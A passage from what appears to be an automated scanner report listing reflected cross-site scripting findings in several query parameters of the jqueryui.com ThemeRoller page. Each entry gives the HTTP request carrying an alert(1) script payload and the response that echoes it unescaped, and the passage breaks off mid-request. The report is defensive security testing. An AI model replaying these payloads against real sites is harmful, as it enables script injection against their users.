Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1273e"><script>alert(1)</script>cd77f13a13f was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

2.153. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e57"><script>alert(1)</script>1a584325653 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

2.154. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ed"><script>alert(1)</script>575a5646092 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.155. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa69"><script>alert(1)</script>b707c48f40 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40" type="text/css" media="all" />
...[SNIP]...

2.156. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902d3"><script>alert(1)</script>d640d8b9ce9 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.157. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b5d"><script>alert(1)</script>44fc3456acc was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

2.158. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a1"><script>alert(1)</script>0008e70e4e1 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

2.159. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4c2"><script>alert(1)</script>73651ee13b2 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.160. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a94"><script>alert(1)</script>14458d207cd was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

2.161. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922fd"><script>alert(1)</script>bfebabdeafa was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&